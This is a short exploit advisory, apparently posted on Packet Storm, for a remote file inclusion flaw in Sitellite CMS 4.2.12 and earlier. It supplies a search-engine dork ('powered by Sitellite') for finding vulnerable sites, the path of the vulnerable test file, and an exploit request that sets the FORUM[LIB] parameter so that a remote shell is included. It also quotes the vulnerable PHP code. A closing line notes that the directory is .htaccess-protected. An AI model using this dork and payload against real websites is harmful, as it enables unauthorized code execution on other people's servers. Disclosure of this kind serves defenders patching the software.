Sitellite CMS versions 4.2.12 and below suffer from a remote file inclusion vulnerability in 559668.php.
4ed906fecdcc37bc301b71c285a269be7270b242f3c771741ffd39d6a68690d9*sitellite*<http://www.sitelliteforge.com/index/siteforge-download-action/proj.sitellite?dl=sitellite-4.2.12-stable.tar.gz>
v 4.2.12
DORK : "powered by Sitellite"
FOUND BY : o0xxdark0o
o0xxdark0o[at]msn.com
Website: http://www.sitellite.org/
DOWNLOAD : http://www.sitelliteforge.com/index/siteforge-app/proj.sitellite
REMOTE FILE ICLUDE
############################################################
FILE :
PATH\saf\lib\PEAR\PhpDocumentor\Documentation\tests\bug-559668.php
############################################################
EXP:
xxx.com\path\saf\lib\PEAR\PhpDocumentor\Documentation\tests\559668.php?FORUM[LIB]=Shell
?
############################################################
CODE: on line 4
<?php
/** @package tests */
/** include tests */
require_once $FORUM['LIB'] . '/classes/db/PearDb.php';
require PEAR . 'test' . 'me';
include('file.ext');
include 'file.ext';
include(PEAR . 'test' . 'me');
?>
############################################################
thanks for all my friends.. str0ke ... mr_6.1.9 .... oxdo .... cold z3ro
www.hach-teach.org - www.3asfh.com
############################################################
BY : o0xxdark0o
o0xxdark0o@msn.com
PhpDocumentor directory is .htaccess'ed
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed